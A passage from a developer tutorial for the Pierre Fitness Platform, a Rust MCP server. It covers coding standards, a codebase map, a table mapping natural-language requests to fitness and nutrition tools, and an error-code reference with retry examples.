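        limit_type: "Daily quota".to_string(),
    };
    // Each field carries machine-readable context; Display renders it for humans.
    assert_eq!(
        err.to_string(),
        "Strava rate limit exceeded (Daily quota); retry after 3600s"
    );
}
```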
Prohibited Patterns (CI Failure)
// ❌ FORBIDDEN: anyhow::anyhow!()
return Err(anyhow::anyhow!("User not found"));

// ❌ FORBIDDEN: anyhow! macro shorthand
return Err(anyhow!("Invalid input"));

// ❌ FORBIDDEN: In map_err closures
.map_err(|e| anyhow!("Failed: {e}"))?;

// ❌ FORBIDDEN: In ok_or_else
.ok_or_else(|| anyhow!("Not found"))?;
unwrap() and expect() Rules
- unwrap(): Only in tests, static data, or a binary's main()
- expect(): Only for documenting invariants that should never fail:

// ✅ OK: Static/compile-time data
"127.0.0.1".parse().expect("valid IP literal")

// ❌ FORBIDDEN: Runtime errors
user_input.parse().expect("should be valid") // NO!
Code Style Requirements
File Headers (REQUIRED)
All code files MUST start with ABOUTME comments:
// ABOUTME: Brief description of what this module does
// ABOUTME: Additional context about the module's responsibility
Import Style (Enforced by Clippy)
Declare use imports at the top of the file; avoid inline qualified paths:
// ✅ GOOD: Imports at the top of the file
use crate::models::User;
use std::collections::HashMap;

fn example() {
    let user = User::new();
    let map = HashMap::new();
}

// ❌ BAD: Inline qualified paths
fn example() {
    let user = crate::models::User::new(); // NO!
    let map = std::collections::HashMap::new(); // NO!
}
Naming Conventions
- NEVER use a _ prefix for unused variables (fix the unused variable properly)
- NEVER name things improved, new, or enhanced; code naming should be evergreen
- NEVER add placeholder, dead_code, or mock code in production
Comments
- NEVER remove existing comments unless provably false
- Comments should be evergreen - avoid temporal references (“after refactor”, “recently changed”)
- Use /// for public API documentation
- Use // for inline implementation comments
Tiered Validation Approach
Tier 1: Quick Iteration (during development)
cargo fmt
cargo check --quiet
cargo test <test_name_pattern> -- --nocapture
Tier 2: Pre-Commit (before committing)
cargo fmt
./scripts/architectural-validation.sh
cargo clippy --all-targets -- -D warnings -D clippy::all -D clippy::pedantic -D clippy::nursery -W clippy::cognitive_complexity
cargo test <module_pattern> -- --nocapture
CRITICAL: Always use --all-targets with clippy. Without it, clippy misses lint errors in tests/, benches/, and binary crates.
Tier 3: Full Validation (before PR/merge)
./scripts/lint-and-test.sh
Full test suite takes ~13 minutes (647 tests). Only run for PRs/merges.
Memory and Performance
Clone Usage Guidelines
Document why each clone() is necessary:
// ✅ OK: Arc clone (cheap, self-documenting)
let db_clone = database.clone();

// ✅ OK: Documented clone
let name = user.name.clone(); // Needed: ownership moves to async task
tokio::spawn(async move {
    process(name).await;
});

// ❌ BAD: Unnecessary clone
let name = user.name.clone();
println!("{}", name); // Should just use &user.name
Arc Usage
- Only use when actual shared ownership required across threads
- Document the sharing requirement in comments
- Prefer &T references when the data's lifetime allows
- Current count: ~107 Arc usages (appropriate for a multi-tenant async architecture)
Lazy Statics
// ✅ GOOD: LazyLock for compile-time-known initialization (Rust 1.80+)
use std::sync::LazyLock;
static CONFIG: LazyLock<Config> = LazyLock::new(Config::load);

// ✅ GOOD: OnceLock for runtime values
use std::sync::OnceLock;
static RUNTIME_CONFIG: OnceLock<Config> = OnceLock::new();
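A runnable sketch of the OnceLock half (the PIERRE_ENV variable name is hypothetical): the initializer runs exactly once, on first access, and every later call returns the cached value.

```rust
use std::sync::OnceLock;

static RUNTIME_CONFIG: OnceLock<String> = OnceLock::new();

// First caller pays for initialization; later callers get the cached value.
fn runtime_config() -> &'static str {
    RUNTIME_CONFIG.get_or_init(|| {
        // PIERRE_ENV is an assumed variable name for illustration.
        std::env::var("PIERRE_ENV").unwrap_or_else(|_| "development".to_string())
    })
}

fn main() {
    let first = runtime_config();
    let second = runtime_config();
    // Both calls return the same cached &'static str.
    assert_eq!(first, second);
    assert!(std::ptr::eq(first, second));
}
```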
Testing Requirements
Test Coverage Policy
NO EXCEPTIONS: All code must have:
- Unit tests
- Integration tests
- End-to-end tests
Only skip with explicit authorization: “I AUTHORIZE YOU TO SKIP WRITING TESTS THIS TIME”
Test Targeting
# By test name (partial match)
cargo test test_training_load
# By test file
cargo test --test intelligence_test
# By module path
cargo test intelligence::
Security Requirements
- Input validation: Validate all user inputs at boundaries
- SQL injection prevention: Use parameterized queries
- Secret management: Never hardcode secrets; use zeroize for crypto keys
- No allow(clippy::...) attributes except for type conversion casts
Module Organization
- Public API defined in mod.rs via re-exports
- Use pub(crate) for internal APIs
- Group related functionality in modules
- Feature flags for conditional compilation (database backends)
Commit Protocol
- Run tiered validation (Tier 2 minimum)
- Create atomic commits with clear messages
- NEVER use the --no-verify flag
- NEVER amend commits already pushed to remote
Key Compliance Checks
| Check | Requirement |
|---|---|
| anyhow!() macro | ❌ FORBIDDEN in production code |
| unwrap() | Tests/static data/binary main only |
| #[allow(clippy::...)] | Only for cast validations |
| ABOUTME comments | REQUIRED on all source files |
| --all-targets | REQUIRED with clippy |
| Structured errors | REQUIRED via AppError, etc. |
Quick Checklist
- No anyhow::anyhow!() in production code
- No unwarranted unwrap() or expect()
- ABOUTME comments at the top of each file
- Use imports, not inline qualified paths
- Document clone() usage when not Arc
- Run clippy with --all-targets
- Tests for all new functionality
Appendix C: Pierre Codebase Map
Quick reference for navigating the Pierre codebase.
Core Modules
- src/lib.rs: Module declarations (45 modules)
- src/bin/pierre-mcp-server.rs: Binary entry point (server startup)
- src/config/: Environment configuration
- src/errors.rs: Error types with thiserror
Authentication & Security
- src/auth.rs: JWT authentication and validation
- src/key_management.rs: MEK/DEK two-tier key management
- src/admin/jwks.rs: JWKS manager for RSA keys
- src/crypto/keys.rs: Ed25519 key generation for A2A
- src/middleware/auth.rs: MCP authentication middleware
Dependency Injection
- src/context/: Focused context DI system
- server.rs: ServerContext composing all contexts
- auth.rs: AuthContext (auth_manager, JWT, JWKS)
- data.rs: DataContext (database, provider_registry)
- config.rs: ConfigContext (config, tenant OAuth)
- notification.rs: NotificationContext (websocket, OAuth notifications)
Database
- src/database_plugins/: Database abstraction layer
- factory.rs: Database trait and factory pattern
- sqlite.rs: SQLite implementation
- postgres.rs: PostgreSQL implementation
MCP Protocol
- src/jsonrpc/: JSON-RPC 2.0 foundation
- src/mcp/protocol.rs: MCP request handlers
- src/mcp/schema.rs: Tool schemas (47 tools)
- src/mcp/tool_handlers.rs: Tool execution logic
- src/mcp/transport_manager.rs: Transport layer coordination
OAuth & Providers
- src/oauth2_server/: OAuth 2.0 server (RFC 7591)
- src/oauth2_client/: OAuth 2.0 client for fitness providers
- src/providers/core.rs: FitnessProvider trait
- src/providers/strava.rs: Strava API integration
- src/providers/garmin_provider.rs: Garmin API integration
- src/providers/fitbit.rs: Fitbit API integration
- src/providers/whoop_provider.rs: WHOOP API integration
- src/providers/terra_provider.rs: Terra API integration (150+ wearables)
Intelligence Algorithms
- src/intelligence/algorithms/tss.rs: Training Stress Score
- src/intelligence/algorithms/training_load.rs: CTL/ATL/TSB
- src/intelligence/algorithms/vo2max.rs: VO2 max estimation
- src/intelligence/algorithms/ftp.rs: FTP detection
- src/intelligence/performance_analyzer.rs: Activity analysis
A2A Protocol
- src/a2a/protocol.rs: A2A message handling
- src/a2a/auth.rs: A2A authentication
- src/a2a/agent_card.rs: Capability discovery
- src/a2a/client.rs: A2A client implementation
- src/a2a_routes.rs: HTTP endpoints for A2A protocol
Output Formatters
- src/formatters/mod.rs: Output format abstraction layer
- OutputFormat: Enum for JSON (default) or TOON format selection
- format_output(): Serialize data to selected format
- TOON: Token-Oriented Object Notation (~40% token reduction for LLMs)
API Key Routes
- src/api_key_routes.rs: HTTP endpoints for API key management
- Trial key requests
- API key status and listing
- User self-service key operations
SDK (TypeScript)
- sdk/src/bridge.ts: SDK bridge (stdio ↔ HTTP)
- sdk/src/types.ts: Generated tool types (47 interfaces)
- sdk/src/secure-storage.ts: OS keychain integration
- sdk/src/cli.ts: CLI wrapper for MCP hosts
Frontend Admin Dashboard (React/TypeScript)
- frontend/src/App.tsx: Main application component
- frontend/src/services/api.ts: Axios API client with CSRF handling
- frontend/src/contexts/: React contexts
- AuthContext.tsx: Authentication state management
- WebSocketContext.ts: WebSocket connection context
- WebSocketProvider.tsx: Real-time updates provider
- frontend/src/hooks/: Custom React hooks
- useAuth.ts: Authentication hook
- useWebSocket.ts: WebSocket connection hook
- frontend/src/components/: UI components (20+)
- Dashboard.tsx: Main dashboard view
- UserManagement.tsx: User approval and management
- A2AManagement.tsx: Agent-to-Agent monitoring
- ApiKeyList.tsx: API key management
- UsageAnalytics.tsx: Request patterns and metrics
- RequestMonitor.tsx: Real-time request monitoring
- ToolUsageBreakdown.tsx: Tool usage visualization
Templates (OAuth HTML)
- templates/oauth_success.html: OAuth success page
- templates/oauth_error.html: OAuth error page
- templates/oauth_login.html: OAuth login page
- templates/pierre-logo.svg: Brand assets
Testing
- tests/helpers/synthetic_data.rs: Deterministic test data
- tests/helpers/synthetic_provider.rs: In-memory provider
- tests/integration/: Integration tests
- tests/e2e/: End-to-end tests
Scripts
See scripts/README.md for comprehensive documentation.
Key scripts by category:
Development
- scripts/dev-start.sh: Start development environment (backend + frontend)
- scripts/fresh-start.sh: Clean database reset
- scripts/setup-git-hooks.sh: Install pre-commit, commit-msg, pre-push hooks
Validation & Testing
- scripts/architectural-validation.sh: Custom pattern validation (anyhow!, DI, etc.)
- scripts/lint-and-test.sh: Full CI validation suite
- scripts/pre-push-tests.sh: Critical path tests (5-10 minutes)
- scripts/smoke-test.sh: Quick validation (2-3 minutes)
- scripts/category-test-runner.sh: Run tests by category (mcp, oauth, security)
SDK & Type Generation
- scripts/generate-sdk-types.js: Auto-generate TypeScript types from server schemas
Deployment
- scripts/deploy.sh: Docker Compose deployment (dev/prod)
Configuration
- scripts/validation-patterns.toml: Architectural validation rules
Key File Locations
| Feature | File Path |
|---|---|
| Tool registry | src/mcp/schema.rs:499 |
| JWT auth | src/auth.rs |
| OAuth server | src/oauth2_server/endpoints.rs |
| Provider trait | src/providers/core.rs:52 |
| TSS calculation | src/intelligence/algorithms/tss.rs |
| Synthetic data | tests/helpers/synthetic_data.rs |
| SDK bridge | sdk/src/bridge.ts |
| Frontend dashboard | frontend/src/components/Dashboard.tsx |
| OAuth templates | templates/oauth_success.html |
| Architectural validation | scripts/architectural-validation.sh |
| Full CI suite | scripts/lint-and-test.sh |
Key Takeaways
- Module organization: 45 modules in src/lib.rs.
- Database abstraction: Factory pattern with SQLite/PostgreSQL implementations.
- MCP protocol: JSON-RPC foundation + MCP-specific handlers.
- OAuth dual role: Server (for MCP clients) + client (for fitness providers).
- Intelligence: Algorithm modules in src/intelligence/algorithms/.
- Testing: Synthetic data for deterministic tests.
- SDK bridge: TypeScript SDK bridges MCP hosts to Pierre server (stdio ↔ HTTP).
- Admin dashboard: React/TypeScript frontend for server management.
- Templates: HTML templates for OAuth flows with brand styling.
- Scripts: Comprehensive tooling for validation, testing, and deployment.
Appendix D: Natural Language to Tool Mapping
Quick reference mapping natural language prompts to Pierre MCP tools.
Supported Providers
Pierre supports 6 fitness providers: strava, garmin, fitbit, whoop, terra, coros
All provider-specific tools accept any of these providers in the provider parameter.
Connection & Authentication
| User says… | Tool | Parameters |
|---|---|---|
| “Link my Strava account” | connect_provider | {"provider": "strava"} |
| “Connect my Garmin watch” | connect_provider | {"provider": "garmin"} |
| “Show my connections” | get_connection_status | None |
| “Disconnect from Fitbit” | disconnect_provider | {"provider": "fitbit"} |
Data Access
| User says… | Tool | Parameters |
|---|---|---|
| “Show my last 10 runs” | get_activities | {"provider": "strava", "limit": 10} |
| “Get my WHOOP workouts” | get_activities | {"provider": "whoop", "limit": 10} |
| “Get my Strava profile” | get_athlete | {"provider": "strava"} |
| “What are my year-to-date stats?” | get_stats | {"provider": "strava"} |
| “Show my Terra data” | get_activities | {"provider": "terra", "limit": 10} |
| “Analyze activity 12345” | get_activity_intelligence | {"activity_id": "12345", "provider": "garmin"} |
Performance Analysis
| User says… | Tool | Parameters |
|---|---|---|
| “Analyze my last workout” | analyze_activity | Activity data |
| “Am I getting faster?” | analyze_performance_trends | Historical activities |
| “Compare my last two rides” | compare_activities | Two activity IDs |
| “Find patterns in my training” | detect_patterns | Activities array |
| “What’s my current fitness level?” | calculate_fitness_score | Activities + user profile |
| “Predict my marathon time” | predict_performance | Current fitness + race details |
Goals
| User says… | Tool | Parameters |
|---|---|---|
| “Set a goal to run sub-20 5K” | set_goal | {"type": "5K", "target_time": "00:20:00"} |
| “How am I progressing?” | track_progress | Goal ID |
| “Suggest realistic goals” | suggest_goals | Current fitness level |
| “Can I run a 3-hour marathon?” | analyze_goal_feasibility | {"goal_type": "marathon", "target_time": "03:00:00"} |
Training Recommendations
| User says… | Tool | Parameters |
|---|---|---|
| “What should I work on?” | generate_recommendations | Performance analysis |
| “Am I overtraining?” | analyze_training_load | Recent activities |
| “Do I need a rest day?” | suggest_rest_day | Recovery metrics |
Nutrition
| User says… | Tool | Parameters |
|---|---|---|
| “How many calories should I eat?” | calculate_daily_nutrition | User profile + activity level |
| “Search for banana nutrition” | search_food | {"query": "banana"} |
| “Show food details for ID 123” | get_food_details | {"fdc_id": "123"} |
| “Analyze this meal” | analyze_meal_nutrition | Array of foods with portions |
| “When should I eat carbs?” | get_nutrient_timing | Training schedule |
Sleep & Recovery
| User says… | Tool | Parameters |
|---|---|---|
| “How was my sleep?” | analyze_sleep_quality | Sleep session data |
| “What’s my recovery score?” | calculate_recovery_score | Multi-factor recovery data |
| “Optimize my sleep schedule” | optimize_sleep_schedule | Sleep history |
| “Track my sleep trends” | track_sleep_trends | Sleep sessions over time |
Configuration
| User says… | Tool | Parameters |
|---|---|---|
| “Update my FTP to 250W” | update_user_configuration | {"ftp": 250} |
| “Calculate my heart rate zones” | calculate_personalized_zones | User profile |
| “Show my configuration” | get_user_configuration | None |
| “What configuration profiles exist?” | get_configuration_catalog | None |
| “Set my fitness config” | set_fitness_config | Config key + value |
| “Show my fitness settings” | get_fitness_config | Config key |
Recipe Management (“Combat des Chefs”)
Pierre includes a training-aware recipe management system that aligns meal planning with training phases.
| User says… | Tool | Parameters |
|---|---|---|
| “What macros should I target for lunch?” | get_recipe_constraints | {"meal_timing": "pre_training"} |
| “Validate this chicken recipe” | validate_recipe | Recipe with ingredients array |
| “Save this recipe to my collection” | save_recipe | Validated recipe data |
| “Show my saved recipes” | list_recipes | {"meal_timing": "post_training"} |
| “Get recipe details for ID 123” | get_recipe | {"recipe_id": "123"} |
| “Delete this recipe” | delete_recipe | {"recipe_id": "123"} |
| “Search for pasta recipes” | search_recipes | {"query": "pasta", "meal_timing": "pre_training"} |
Recipe Workflow Pattern:
1. get_recipe_constraints → Get macro targets for training phase
2. LLM generates recipe matching constraints
3. validate_recipe → Check nutrition against USDA database
4. save_recipe → Store validated recipe
5. list_recipes/search_recipes → Browse collection
Prompt Patterns
Pattern 1: Temporal queries
- “my last X…” → limit: X, offset: 0
- “this week…” → Filter by start_date >= week_start
- “in the past month…” → Filter by date range

Pattern 2: Comparative queries
- “compare A and B” → compare_activities with two IDs
- “better than…” → Fetch both, compare metrics

Pattern 3: Trend queries
- “am I improving?” → analyze_performance_trends
- “getting faster/slower?” → Trend analysis with slope

Pattern 4: Predictive queries
- “can I…?” → analyze_goal_feasibility
- “what if…?” → predict_performance with scenarios
Key Takeaways
- Natural language: AI assistants map user prompts to tool calls automatically.
- Temporal context: “last 10”, “this week”, “past month” determine filters.
- Implicit parameters: Provider (strava, garmin, fitbit, whoop, terra) often inferred from context or connection status.
- Tool chaining: Complex queries combine multiple tools sequentially.
- Context awareness: AI remembers previous queries for follow-up questions.
- Multi-provider: Users can connect multiple providers and query them independently.
End of Tutorial
You’ve completed the comprehensive Pierre Fitness Platform tutorial! You now understand:
- Part I: Foundation (architecture, errors, config, DI)
- Part II: Authentication & Security (cryptography, JWT, multi-tenancy, middleware)
- Part III: MCP Protocol (JSON-RPC, request flow, transports, tool registry)
- Part IV: SDK & Type System (bridge architecture, type generation)
- Part V: OAuth, A2A & Providers (OAuth server/client, provider abstraction, A2A protocol)
- Part VI: Tools & Intelligence (47 tools, sports science algorithms, recovery, nutrition)
- Part VII: Testing & Deployment (synthetic data, design system, production deployment)
Next Steps:
- Review CLAUDE.md for code standards
- Explore the codebase using Appendix C as a map
- Run the test suite to see synthetic data in action
- Set up local development environment
- Contribute improvements or new features
Happy coding! 🚀
Appendix H: Error Code Reference
This appendix provides a comprehensive reference of all error codes, their HTTP status mappings, and recommended handling strategies.
Error Code Categories
Pierre uses four primary error enums:
- ErrorCode: Application-level error codes with HTTP mapping
- DatabaseError: Database operation errors
- ProviderError: Fitness provider API errors
- ProtocolError: Protocol operation errors (MCP/A2A)
ErrorCode → HTTP Status Mapping
Source: src/errors.rs:17-86
Authentication & Authorization (4xx)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| AuthRequired | 401 | No authentication provided | Prompt user to login |
| AuthInvalid | 401 | Invalid credentials | Re-authenticate |
| AuthExpired | 403 | Token has expired | Refresh token or re-login |
| AuthMalformed | 403 | Token is corrupted | Re-authenticate |
| PermissionDenied | 403 | Insufficient permissions | Request access or escalate |
Rate Limiting (429)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| RateLimitExceeded | 429 | Too many requests | Implement exponential backoff |
| QuotaExceeded | 429 | Monthly quota exceeded | Upgrade tier or wait for reset |
Validation (400)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| InvalidInput | 400 | Input validation failed | Fix input and retry |
| MissingRequiredField | 400 | Required field missing | Include required fields |
| InvalidFormat | 400 | Data format incorrect | Check API documentation |
| ValueOutOfRange | 400 | Value outside bounds | Use valid value range |
Resource Management (4xx)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| ResourceNotFound | 404 | Resource doesn’t exist | Check resource ID |
| ResourceAlreadyExists | 409 | Duplicate resource | Use existing or rename |
| ResourceLocked | 409 | Resource is locked | Wait and retry |
| ResourceUnavailable | 503 | Temporarily unavailable | Retry with backoff |
External Services (5xx)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| ExternalServiceError | 502 | Provider returned error | Retry or report issue |
| ExternalServiceUnavailable | 502 | Provider is down | Retry later |
| ExternalAuthFailed | 503 | Provider auth failed | Re-connect provider |
| ExternalRateLimited | 503 | Provider rate limited | Wait for provider reset |
Configuration (500)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| ConfigError | 500 | Configuration error | Contact administrator |
| ConfigMissing | 500 | Missing configuration | Contact administrator |
| ConfigInvalid | 500 | Invalid configuration | Contact administrator |
Internal Errors (500)
| Error Code | HTTP Status | Description | Client Action |
|---|---|---|---|
| InternalError | 500 | Unexpected server error | Retry, then report |
| DatabaseError | 500 | Database operation failed | Retry, then report |
| StorageError | 500 | Storage operation failed | Retry, then report |
| SerializationError | 500 | JSON parsing failed | Check request format |
DatabaseError Variants
Source: src/database/errors.rs:10-140
| Variant | Context Fields | Typical Cause |
|---|---|---|
| NotFound | entity_type, entity_id | Query returned no rows |
| TenantIsolationViolation | entity_type, entity_id, requested_tenant, actual_tenant | Cross-tenant access attempt |
| EncryptionFailed | context | Encryption key issue |
| DecryptionFailed | context | AAD mismatch or corrupt data |
| ConstraintViolation | constraint, details | Unique/foreign key violation |
| ConnectionError | message | Pool exhausted or network |
| QueryError | context | SQL syntax or type error |
| MigrationError | version, details | Schema migration failed |
| InvalidData | field, reason | Data type mismatch |
| PoolExhausted | max_connections, wait_time_ms | Too many concurrent queries |
| TransactionRollback | reason | Explicit rollback |
| SchemaMismatch | expected, actual | Database version mismatch |
| Timeout | operation, timeout_secs | Query took too long |
| TransactionConflict | details | Deadlock or serialization failure |
ProviderError Variants
Source: src/providers/errors.rs:11-80
| Variant | Context Fields | Retry Strategy |
|---|---|---|
| ApiError | provider, status_code, message, retryable | Check retryable field |
| RateLimitExceeded | provider, retry_after_secs, limit_type | Wait retry_after_secs |
| AuthenticationFailed | provider, reason | Re-authenticate user |
| TokenExpired | provider | Auto-refresh token |
| InvalidResponse | provider, context | Log and skip activity |
| NetworkError | provider, message | Retry with backoff |
| Timeout | provider, timeout_secs | Increase timeout or retry |
| NotSupported | provider, feature | Feature unavailable |
ProtocolError Variants
Source: src/protocols/mod.rs:35-211
Protocol errors for MCP and A2A protocol operations:
Tool Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
| ToolNotFound | tool_id, available_count | Tool ID doesn’t exist |
| InvalidParameter | tool_id, parameter, reason | Parameter validation failed |
| MissingParameter | tool_id, parameter | Required parameter not provided |
| InvalidParameters | message | General parameter error |
| ExecutionFailed | message | Tool execution error |
| ExecutionFailedDetailed | tool_id, source | Tool execution with source error |
Protocol Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
| UnsupportedProtocol | protocol | Protocol type not supported |
| InvalidRequest | message | Malformed request |
| InvalidRequestDetailed | protocol, reason | Request validation failure |
| ConversionFailed | from, to, reason | Protocol format conversion error |
Configuration Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
| ConfigMissing | key | Required config not set |
| ConfigurationError | message | General config error |
| ConfigurationErrorDetailed | message | Config error with details |
Plugin Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
| PluginNotFound | plugin_id | Plugin ID doesn’t exist |
| PluginError | plugin_id, details | Plugin execution failed |
Access Control Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
| InsufficientSubscription | required, current | User tier too low |
| RateLimitExceeded | requests, window_secs | Too many requests |
Other Errors
| Variant | Context Fields | Typical Cause |
|---|---|---|
| Serialization | context, source | JSON serialization failed |
| SerializationError | message | Simple serialization error |
| Database | source | Database operation failed |
| InvalidSchema | entity, reason | Schema validation error |
| InternalError | message | Unexpected server error |
| OperationCancelled | message | User cancelled operation |
JSON Error Response Format
All API errors return a consistent JSON structure:
{
"error": {
"code": "auth_expired",
"message": "The authentication token has expired",
"details": {
"expired_at": "2025-01-15T10:30:00Z",
"token_type": "access_token"
},
"request_id": "req_abc123"
}
}
Fields:
- code: Machine-readable error code (snake_case)
- message: Human-readable description
- details: Optional context-specific data
- request_id: Correlation ID for debugging
MCP Error Response Format
For MCP protocol, errors follow JSON-RPC 2.0 spec:
{
"jsonrpc": "2.0",
"id": 1,
"error": {
"code": -32600,
"message": "Invalid Request",
"data": {
"pierre_code": "invalid_input",
"details": "Missing required field: provider"
}
}
}
JSON-RPC Error Codes:
| Code | Meaning | Pierre Mapping |
|---|---|---|
| -32700 | Parse error | SerializationError |
| -32600 | Invalid Request | InvalidInput |
| -32601 | Method not found | ResourceNotFound |
| -32602 | Invalid params | InvalidInput |
| -32603 | Internal error | InternalError |
| -32000 to -32099 | Server error | Application-specific |
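The table above can be sketched as a mapping function. This is illustrative only; the function name is hypothetical and the snake_case strings are assumed from the JSON error response format shown earlier:

```rust
// Hedged sketch: map an incoming JSON-RPC error code to a Pierre error code
// string per the table above. Codes in -32099..=-32000 are application-specific.
fn pierre_code_for(jsonrpc_code: i32) -> &'static str {
    match jsonrpc_code {
        -32700 => "serialization_error",
        -32600 | -32602 => "invalid_input", // Invalid Request and Invalid params
        -32601 => "resource_not_found",
        -32603 => "internal_error",
        c if (-32099..=-32000).contains(&c) => "application_specific",
        _ => "internal_error", // conservative default for unknown codes
    }
}

fn main() {
    assert_eq!(pierre_code_for(-32601), "resource_not_found");
    assert_eq!(pierre_code_for(-32050), "application_specific");
}
```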
Retry Strategies
Exponential Backoff
// Standard retry with exponential backoff
let delays = [100, 200, 400, 800, 1600]; // milliseconds
for delay in delays {
    match operation().await {
        Ok(result) => return Ok(result),
        Err(e) if e.is_retryable() => {
            tokio::time::sleep(Duration::from_millis(delay)).await;
        }
        Err(e) => return Err(e),
    }
}
// Final attempt after the last delay
operation().await
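A self-contained synchronous variant of the same strategy, for illustration: std::thread::sleep stands in for tokio::time::sleep, and the is_retryable predicate is passed in rather than assumed on the error type. The function name and signature are hypothetical, not Pierre's API:

```rust
use std::time::Duration;

// Retries `op` with exponential backoff; `is_retryable` decides whether an
// error warrants another attempt. One final attempt follows the last delay.
fn retry_with_backoff<T, E>(
    mut op: impl FnMut() -> Result<T, E>,
    is_retryable: impl Fn(&E) -> bool,
) -> Result<T, E> {
    let delays_ms = [100u64, 200, 400, 800, 1600];
    for delay in delays_ms {
        match op() {
            Ok(value) => return Ok(value),
            Err(e) if is_retryable(&e) => {
                std::thread::sleep(Duration::from_millis(delay));
            }
            Err(e) => return Err(e),
        }
    }
    op() // final attempt after exhausting the delay schedule
}

fn main() {
    // Simulated transient failure: succeeds on the third attempt.
    let mut attempts = 0;
    let result = retry_with_backoff(
        || {
            attempts += 1;
            if attempts < 3 { Err("transient") } else { Ok(attempts) }
        },
        |_| true,
    );
    assert_eq!(result, Ok(3));
}
```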
Rate Limit Handling
match provider.get_activities().await {
    Err(ProviderError::RateLimitExceeded { retry_after_secs, .. }) => {
        // Respect the Retry-After interval before the single retry
        tokio::time::sleep(Duration::from_secs(retry_after_secs)).await;
        provider.get_activities().await
    }
    result => result,
}
Error Logging
All errors are logged with structured context:
tracing::error!(
    error_code = %error.code(),
    http_status = error.http_status(),
    request_id = %request_id,
    user_id = %user_id,
    "Operation failed: {}", error
);
Key Takeaways
- Consistent HTTP mapping: ErrorCode::http_status() provides standardized status codes.
- Structured context: All errors include relevant context fields for debugging.
- Retry guidance: The retryable field and retry_after_secs guide client behavior.
- Tenant isolation: TenantIsolationViolation is a security-critical error.
- JSON-RPC compliance: MCP errors follow the JSON-RPC 2.0 specification.
- Request correlation: All errors include request_id for distributed tracing.
Related Chapters:
- Chapter 2: Error Handling (structured error patterns)
- Chapter 9: JSON-RPC Foundation (MCP error codes)
- Appendix E: Rate Limiting (quota errors)